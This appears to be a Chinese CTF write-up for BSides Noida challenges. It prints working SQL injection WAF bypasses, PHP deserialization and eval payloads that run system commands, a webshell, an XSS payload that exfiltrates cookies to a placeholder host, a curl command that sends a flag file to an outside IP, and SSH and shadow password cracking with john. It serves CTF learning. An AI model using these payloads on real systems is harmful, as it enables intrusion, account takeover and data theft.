比赛网址:https://ctf.bsidesnoida.in/challs

web

Baby Web

题目描述

Link

Sauce

查看给出附件的index.php文件,可以发现这些语句与sql查询有关

令id为空chall_id=查询一下得到报错

1
2
3
Warning: SQLite3::query(): Unable to prepare statement: 1, incomplete input in /www/index.php on line 140

Fatal error: Uncaught Error: Call to a member function fetchArray() on bool in /www/index.php:141 Stack trace: #0 {main} thrown in /www/index.php on line 141

得知是sqlite数据库,经测试发现参数只能是数字,输入字母和符号则会跳转至error.html

查看一下ctf.conf发现👇一些正则表达式用于过滤字母和空格

1
2
3
4
5
6
7
if ($args ~ [%]){
       	return 500;
       }

       if ( $arg_chall_id ~ [A-Za-z_.%]){
	return 500;
}

①这里可以利用参数污染来绕过waf

/?chall_id=1&chall_id=a

可以看见报错,得知方法可行,通过网页源代码得知有6列

1
2
//payload1:
/?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,sql/**/FROM/**/sqlite_master

得到flag表名

1
2
//payload2:
/?chall_id=1&chall_id=1/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,flag/**/FROM/**/flagsss

得到flag

BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}

②利用PHP字符串解析特性bypass

我们知道PHP将查询字符串(在URL或正文中)转换为内部$_GET或的关联数组$_POST。例如:/?foo=bar变成 Array([foo] => "bar")。值得注意的是,查询字符串在解析的过程中会将某些字符删除或用下划线代替。例如,/?%20news[id%00=42会转换为Array([news_id] => 42)。如果一个IDS/IPS或WAF中有一条规则是当news_id参数的值是一个非数字的值则拦截,那么我们就可以用以下语句绕过:

1
/news.php?%20news[id%00=42"+AND+1=0--

上述PHP语句的参数%20news[id%00的值将存储到$_GET[“news_id”]中。

HP需要将所有参数转换为有效的变量名,因此在解析查询字符串时,它会做两件事:

1.删除空白符

2.将某些字符转换为下划线(包括空格)

%20与%00也不一定要加。

User input Decoded PHP variable name
%20foo_bar%00 foo_bar foo_bar
foo%20bar%00 foo bar foo_bar
foo%5bbar foo[bar foo_bar

而且所有参数不能带%,过滤了空格可以用注释符代替。

字段为6

1
http://ctf.babyweb.bsidesnoida.in/?chall[id=1/**/order/**/by/**/6

sqlite查询语句

1
sqlite> select tbl_name from sqlite_master where type='table';
1
sqlite> select sql from sqlite_master where type='table';
1
sqlite_version();

查表名

1
2
3
4
5
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/0,1),4,5,6

http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/1,1),4,5,6

http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/tbl_name/**/from/**/sqlite_master/**/limit/**/2,1),4,5,6

查字段

1
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/sql/**/from/**/sqlite_master/**/limit/**/2,1),4,5,6

实际上前面不查询表名也可以。这里一样会回显出来。

1
http://ctf.babyweb.bsidesnoida.in/?chall[id=-1/**/union/**/select/**/1,2,(select/**/flag/**/from/**/flagsss),4,5,6

BSNoida{4_v3ry_w4rm_w31c0m3_2_bs1d35_n01d4}

关于HTTP参数污染

概念:HTTP参数污染,也叫HPP(HTTP Parameter Pollution),简单讲就是对一个参数进行两次或多次赋值,然后由于现行的HTTP标准并没有提及在遇到多个值赋给一个参数时应怎样处理,并且不同的网站后端相应的处理方式不同,从而造成解析错误。

网站 传入参数 接受参数
百度 ?wd=1&wd=2 第一个参数
谷歌 ?q=a&q=b 按次序全部接受(a b)
必应 ?q=1&q=2 第二个参数
Web服务器 参数获取函数 获取到的参数
PHP/Apache $_GET(“par”) Last
JSP/Tomcat Request.getParameter(“par”) First
Perl(CGI)/Apache Param(“par”) First
Python/Apache getvalue(“par”) All (List)
ASP/IIS Request.QueryString(“par”) All (comma-delimited string)

产生原因及利用:

HPP漏洞产生原因一方面来自服务器处理机制不同,另一方面来自开发人员后端检测逻辑的问题。HTTP 参数污染的风险实际上取决于后端所执行的操作,以及被污染的参数提交到了哪里。总体上HPP一般有两种利用场景:

  1. 逻辑漏洞,通常会造成IDOR,信息泄露,越权等漏洞;
  2. 作为其他漏洞的辅助,用于绕过漏洞的检测和Waf等。

HTTP参数污染 –HPP 参考链接1参考链接2

利用PHP的字符串解析特性的bypass 参考链接

wowooo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
include 'flag.php';
function filter($string){
    $filter = '/flag/i';
    return preg_replace($filter,'flagcc',$string);
}
$username=$_GET['name'];
$pass="V13tN4m_number_one";
$pass="Fl4g_in_V13tN4m";
$ser='a:2:{i:0;s:'.strlen($username).":\"$username\";i:1;s:".strlen($pass).":\"$pass\";}";

$authen = unserialize(filter($ser));

if($authen[1]==="V13tN4m_number_one "){
    echo $flag;
}
if (!isset($_GET['debug'])) {
    echo("PLSSS DONT HACK ME!!!!!!").PHP_EOL;
} else {
    highlight_file( __FILE__);
}
?>
<!-- debug -->

考点:反序列化逃逸

1
2
//payload
flagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflagflag";i:1;s:19:"V13tN4m_number_one ";}}}

BSNoida{3z_ch4all_46481684185_!!!!!!@!}

freepoint

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
 <?php

include "config.php";
function filter($str) {
    if(preg_match("/system|exec|passthru|shell_exec|pcntl_exec|bin2hex|popen|scandir|hex2bin|[~$.^_`]|\'[a-z]|\"[a-z0-9]/i",$str)) {
        return false;
    } else {
        return true;
    }
}
class BSides {
    protected $option;
    protected $name;
    protected $note;

    function __construct() {
        $option = "no flag";
        $name = "guest";
        $note = "flag{flag_phake}";
        $this->load();
    }

    public function load()
    {
        if ($this->option === "no flag") {
            die("flag here ! :)");
        } else if ($this->option === "getFlag"){
            $this->loadFlag();
        } else {
            die("You don't need flag ?");
        }
    }
    private function loadFlag() {
        if (isset($this->note) && isset($this->name)) {
            if ($this->name === "admin") {
                if (filter($this->note) == 1) {
                    eval($this->note.";");
                } else {
                    die("18cm30p !! :< ");
                }
            }
        }
    }

    function __destruct() {
        $this->load();
    }
}

if (isset($_GET['ctf'])) {
    $ctf = (string)$_GET['ctf'];
    if (check($ctf)) { //check nullbytes
        unserialize($ctf);
    }
} else {
    highlight_file(__FILE__);
}
?>

上边的正则在字母数字前后加了引号。。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
//payload
<?php

class BSides {
    public $option = "getFlag";
    public $name = "admin";
    public $note = 'eval(urldecode("%70%68%70%69%6e%66%6f%28%29%3b"))';

}

// echo urlencode("phpinfo();"),"\n";
$a = new BSides();
echo urlencode(serialize($a));

//eval(urldecode("%73%79%73%74%65%6d%28%24%5f%47%45%54%5b%31%5d%29%3b")) # system($_GET[1]);
//在/home目录下找到flag


//payload2
//strrev()反转字符串
<?php
class BSides {
    public $option = "getFlag";
    public $name = "admin";
    public $note = "eval(strrev(\";))'02478747e2878787f556e6f57643c666f256d6f686f202471636'(nib2xeh(metsys\"));";
}

$a = new BSides();
echo urlencode(serialize($a));
?>
//"eval(strrev(\";))'37c6'(nib2xeh(metsys\"));"
//"eval(strrev(\";)'*lf eman- emoh/ dnif'(metsys\"));"; 
#/home/fl4g_ne_xxx.txt    
//"eval(strrev(\";))'02478747e2878787f556e6f57643c666f256d6f686f202471636'(nib2xeh(metsys\"));"

BSNoida{Fre3_fl4g_f04_y0u_@@55361988!!!}

Basic Notepad

注册并登录进去之后是一个留言板,经典xss

抓包看一眼,看到post传msg参数,cookie里有个auth

尝试弹一下,发现直接被转义了。。执行不了

可以看到👇

1
Content-Security-Policy: script-src 'none'; object-src 'none'; base-uri 'none'; script-src-elem 'none';report-url /report/8ABSA8rH61-14U3dfGOfog

在token末尾加上一句; script-src-attr 'unsafe-inline'

下面就可以用 window.location 进行绕过了。

1
<img src=# onerror=alert(1)>

在token处添加url编码过的; script-src-attr 'unsafe-inline'成功弹窗

1
2
//弹cookie
<img src=# onerror='fetch("http://xxxx:8000/?cookie=" + encodeURI(document.cookie))'>

监听8000端口

得到cookie为YWRtaW46djNyeTUzY3IzdFA0c3N3MHJkZGRkbase64解密得admin:v3ry53cr3tP4ssw0rdddd

修改cookie进入即可看到flag

Calculate

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
error_reporting(0);
include "config.php";

if (isset($_POST['VietNam'])) {
    $VN = $_POST['VietNam'];
    if (filter($VN)) {
        die("nope!!");
    }
    if (!is_string($VN) || strlen($VN) > 110) {
        die("18cm30p ??? =)))");
    }
    else {
        $VN = "echo ".$VN.";";
        eval($VN);
    }
} else {
    if (isset($_GET['check'])) {
        echo phpinfo();
    }
    else {
        highlight_file(__FILE__);
    }
}
?>

查看一下phpinfo发现过滤了大量函数,fuzz发现没有过滤exec

1
2
3
4
5
6
7
8
9
10
11
12
//config.php
<?php
if(isset($_GET['🐶'])) {
    highlight_file(__FILE__);
}
function filter($payload) {
    if (preg_match("/[a-zA-BD-Z!@#%^&*:'\"|`~\\\\]|3|5|6|9/",$payload)) {
        return true;
    }
}
?>
<!-- ?🐶 -->

过滤了字母数字可以考虑用不可见字符,但是这里过滤了位运算符、取反,没有过滤小括号,可以使用函数、没有过滤$+=、大写的C、下划线、数字1,2等,可以考虑自增运算构造 webshell。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
<?php
# ${_GET}{1}(${_GET}{2}) 传入       1=system 2=ls

$_=C;
$_++;$_++;
$__=$_; #E
$_++;$_++; # G
$___=$_;
$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++; # T
$_=_.$___.$__.$_; #_GET
${$_}{1}(${$_}{2});

//payload
1;$_=C;$_++;$_++;$__=$_;$_++;$_++;$___=$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_++;$_=_.$___.$__.$_;${$_}{1}(${$_}{2})

长度超出限制,利用php中构造NAN来获取N,再进行自增取T


<?php
$_=C;
$_++;
$C=++$_;
$_++;$_++;
$C_=$_;
$_=(C/C.C)[0];
$_++;$_++;$_++;$_++;$_++;
$_=_.$C_.$C.++$_;
${$_}{1}(${$_}{2});

//$_=(C/C.C)[0]的原理是,C/C得到 NAN ,然后连接C使得转化为字符串 NANC,这样才能获取到第0个元素。为了尽量减小 payload 长度,还需要把变量名尽可能缩小。

//final payload
$_=C;$_++;$C=++$_;$_++;$_++;$C_=$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;${$_}{1}(${$_}{2})
# urlencode
%24_%3DC%3B%24_%2B%2B%3B%24C%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24C_%3D%24_%3B%24_%3D%28C%2FC.C%29%5B0%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24C_.%24C.%2B%2B%24_%3B%24%7B%24_%7D%7B1%7D%28%24%7B%24_%7D%7B2%7D%29%3B
   
//传参
1=exec&2=curl xxx.xxx.xxx.xxx:xxx -d "`cat /home/fl4g_h1hih1i_xxx.txt`"

misc

Farewell

题目描述

chall link

拼图即可

Psst

题目描述

chall file

附件为套了70层的压缩包…….我真是人麻了。。。

解压后发现到31层之后的文件无法显示并且多了一个security.的文件夹还怎么搞都删不掉。。。。真**sb,最后还是利用winrar的压缩并删除原文件给删了。

尝试写代码无果,纯手撸,本来可以拿个3血的。。但是有两个字符顺序整反了,,,,不知道自己是怎么做到的。。

My Artwork

题目描述

chall link

大概意思就是用代码画了个图结合题目附件名字art.TURTLE,turtle想到了python中的海龟画图在线网站戳这里

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
TO SPAWN_FLAG

PRINT [GET A CUP OF COFFEE AND ENJOY...]
PRINT [DRAWING THE FLAG FOR YOU...]
PRINT [LOOK AT THE SCREEN...]

REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 200 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 10000 [FD 200 RT 90 FD 200 RT 90 FD 200+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50 BK 250 LT 90 FD 200 RT 90 FD 250-REPCOUNT/1000000 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS

PRINT [KEEP LOOKING...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS

REPEAT 10000 [FD 200 LT 90 FD 50-REPCOUNT/1000000 BK 100 FD 50 LT 90 FD 200+REPCOUNT/1000000 RT 90 FD 50 BK 100 FD 50 RT 90]
CS
REPEAT 10000 [RT 90 FD 200 LT 90 FD 100 LT 90 FD 200 RT 90 FD 100 RT 90 FD 200 BK 200-REPCOUNT/1000000 RT 90 FD 100 LT 90 FD 200 RT 90 FD 100+REPCOUNT/1000000 RT 90 FD 200 RT 90]
CS

PRINT [LOOK AT THE SCREEN...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS

PRINT [KEEP LOOKING...]
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50-REPCOUNT/1000000 BK 250 LT 90 FD 100 RT 90 FD 200 BK 200 LT 90 FD 100 RT 90 FD 250 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 600 [RT 35 FD 200 RT 110 FD 100 RT 125 FD 115 BK 115+REPCOUNT/1000000 LT 125 FD 100+REPCOUNT/1000000 BK 200 RT 70 FD 200 RT 145]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 BK 200 RT 90 FD 200+REPCOUNT/1000000 LT 90 FD 200 BK 200 LT 90 FD 200 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 100 BK 200+REPCOUNT/1000000 FD 100 LT 90 FD 200 RT 180]
CS
REPEAT 10000 [FD 100 LT 35 FD 100 BK 100+REPCOUNT/1000000 RT 70 FD 100 BK 100 RT 145 FD 100-REPCOUNT/1000000 RT 180]
CS

PRINT [LOOK AT THE SCREEN...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS

REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50-REPCOUNT/1000000 BK 250 LT 90 FD 100 RT 90 FD 200 BK 200 LT 90 FD 100 RT 90 FD 250 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 600 [RT 35 FD 200 RT 110 FD 100 RT 125 FD 115 BK 115+REPCOUNT/1000000 LT 125 FD 100+REPCOUNT/1000000 BK 200 RT 70 FD 200 RT 145]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 BK 200 RT 90 FD 200+REPCOUNT/1000000 LT 90 FD 200 BK 200 LT 90 FD 200 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 100 BK 200+REPCOUNT/1000000 FD 100 LT 90 FD 200 RT 180]
CS
REPEAT 10000 [FD 100 LT 35 FD 100 BK 100+REPCOUNT/1000000 RT 70 FD 100 BK 100 RT 145 FD 100-REPCOUNT/1000000 RT 180]
CS

PRINT [WAIT FOR IT...]
REPEAT 500 [FD 10 RT 90 FD 200 RT 90 FD 10+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS

PRINT [WAIT FOR IT...]
REPEAT 10000 [FD 200 LT 90 FD 50-REPCOUNT/1000000 BK 100 FD 50 LT 90 FD 200+REPCOUNT/1000000 RT 90 FD 50 BK 100 FD 50 RT 90]
CS
REPEAT 10000 [RT 90 FD 200 LT 90 FD 100 LT 90 FD 200 RT 90 FD 100 RT 90 FD 200 BK 200-REPCOUNT/1000000 RT 90 FD 100 LT 90 FD 200 RT 90 FD 100+REPCOUNT/1000000 RT 90 FD 200 RT 90]
CS

PRINT [WAIT FOR IT...]
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 200 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
CS
REPEAT 10000 [FD 200 RT 90 FD 200 RT 90 FD 200+REPCOUNT/1000000 RT 90 FD 200-REPCOUNT/1000000 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 LT 90 FD 50 BK 250 LT 90 FD 200 RT 90 FD 250-REPCOUNT/1000000 BK 50 RT 90]
CS
REPEAT 10000 [FD 200-REPCOUNT/1000000 RT 90 FD 200 BK 200 RT 90 FD 100 LT 90 FD 100 BK 100 RT 90 FD 100 LT 90 FD 200 BK 200-REPCOUNT/1000000 LT 90]
PRINT [TADAAAAA!!!]

END

每一行REPEAT都是一个字符,拼起来就是flag

1
2
3
CODE_IS_BEAUTY_BEAUTY_IS_CODE

BSNoida{CODE_IS_BEAUTY_BEAUTY_IS_CODE}

Death Note

题目描述

chall link

由于对应的room被关闭,在这里记录一下大佬的思路。

一、

nmap扫出来只有22和80端口

通过给出的wordlist扫目录发现了👇

1
2
3
4
5
6
7
index.html              [Status: 200, Size: 4173, Words: 1633, Lines: 104]
s3cr3t                  [Status: 200, Size: 63, Words: 12, Lines: 2]
robots.txt              [Status: 200, Size: 17, Words: 3, Lines: 2]
ryuk.apples             [Status: 200, Size: 1766, Words: 9, Lines: 31]
robots.txt              [Status: 200, Size: 17, Words: 3, Lines: 2]
server-status           [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [4614/4614] :: Job [1/1] :: 148 req/sec :: Duration: [0:00:31] :: Errors: 0 ::

ryuk.apples中存在一个ssh私钥

使用ssh2john和给出的wordlist进行爆破

1
2
3
4
#相应命令
ssh2john id > id_hash

john -w=wordlist.txt id_hash

得到了密码

登录之后发现了passwd和shadow

接着爆破

1
2
3
4
#命令
unshadow passwd shadow > user_hashes

john -w=wordlist.txt user_hashes

得到light用户的密码

之后提权cat flag

1
2
sudo -l
sudo cat /root/root.txt

二、

先端口扫描发现只有22和80

之后用Gobuster扫目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
===============================================================[2/89]
Gobuster v3.1.0           
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) 
===============================================================
[+] Url: http://10.10.4.58/
[+] Method:  GET              
[+] Threads: 10               
[+] Wordlist:wordlist.txt       
[+] Negative Status codes:   404              
[+] User Agent:              gobuster/3.1.0     
[+] Extensions:              php,html,txt       
[+] Timeout: 				 10s
===============================================================
2021/08/08 02:35:45 Starting gobuster in directory enumeration mode
===============================================================
/.hta.txt             (Status: 403) [Size: 275]
/.hta 				  (Status: 403) [Size: 275]
/.hta.php             (Status: 403) [Size: 275]
/.hta.html            (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.htpasswd.txt        (Status: 403) [Size: 275]
/.htaccess.txt        (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htpasswd.html       (Status: 403) [Size: 275]
/.htaccess.html       (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/index.html           (Status: 200) [Size: 4173]
/index.html           (Status: 200) [Size: 4173]
/s3cr3t               (Status: 200) [Size: 63] 
/ryuk.apples          (Status: 200) [Size: 1766]
/robots.txt           (Status: 200) [Size: 17] 
/robots.txt           (Status: 200) [Size: 17] 
/robots.txt           (Status: 200) [Size: 17] 
/server-status        (Status: 403) [Size: 275]
           
===============================================================
2021/08/08 02:43:02 Finished
===============================================================

s3ce3t

image-20210808031820298

ryuk.apples

接下来就是爆破ssh

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/usr/share/john/ssh2john.py ryuk.apples > hash

┌──(kali㉿kali)-[~/Desktop/thm/aa]
└─$ john --wordlist=wordlist.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after      
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status                      
l1ght1skir4      (ryuk.apples)
1g 0:00:00:00 DONE (2021-08-08 02:44) 100.0g/s 461400p/s 461400c/s 461400C/s zone..zt
Session completed

整体和第一个思路差不多

1
BSNoida{Pr1vEsc_w4a_E4sy_P3a5y}

参考链接1

参考链接2